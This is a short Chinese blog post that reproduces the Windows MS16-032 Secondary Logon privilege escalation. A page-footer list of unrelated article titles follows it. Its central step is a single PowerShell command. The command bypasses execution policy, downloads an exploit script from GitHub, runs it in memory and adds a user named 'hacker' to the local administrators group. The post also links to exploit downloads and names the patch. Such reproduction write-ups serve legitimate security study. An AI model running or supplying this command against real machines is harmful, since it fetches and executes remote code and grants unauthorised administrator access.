MS16-032 漏洞复现
2024-08-25 22:04:38
exploit-db的详情: https://www.exploit-db.com/exploits/39574/
Windows: Secondary Logon Standard Handles Missing Sanitization EoP
Platform: Windows 8.1, Windows 10, not testing on Windows 7
Class: Elevation of Privilege
0x01使用标准用户登陆win7,下图是当前登录用户abc的详细信息。
0x02直接执行命令进行提权,简单粗暴
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1');Invoke-MS16-032 -Application cmd.exe -commandline '/c net localgroup administrators hacker /add'"
0x03下面就是见证奇迹的时刻了
该漏洞危害十分严重,如图在2008server上测试
本地测试如图,被安全软件检测到。
微软官方在2016年3月8日发布了补丁KB3139914。
附上利用提取文件下载地址https://github.com/hexx0r/CVE-2016-0051
最新文章
- 相机标定简介与MatLab相机标定工具箱的使用(未涉及原理公式推导)
- Linux Shell shortcut
- $(";";).click与onclick的区别示例介绍
- JS添加删除DIV
- CEF3开发者系列之进程和线程
- Oracle常用操作-----(一)
- CK13物料价格评估的数据ALV显示
- WinStore开发知识导航集锦
- WebSockets基础
- HDU 4351 Digital root 线段树区间合并
- 写给系统管理员的25个PHP安全实践
- FreeMarker中if标签内的判断条件
- [转] windows7 IIS管理器 在计算机“.”上没有找到WAS服务
- centos上安装jdk环境
- 慎用StringEscapeUtils.escapeHtml步骤
- jQuery实现页面关键字搜索
- ZOJ 3623 Battle Ships 简单DP
- [国嵌攻略][165][usb下载线驱动设计]
- 安装QT5.02
- C++ Primer 笔记——const 限定符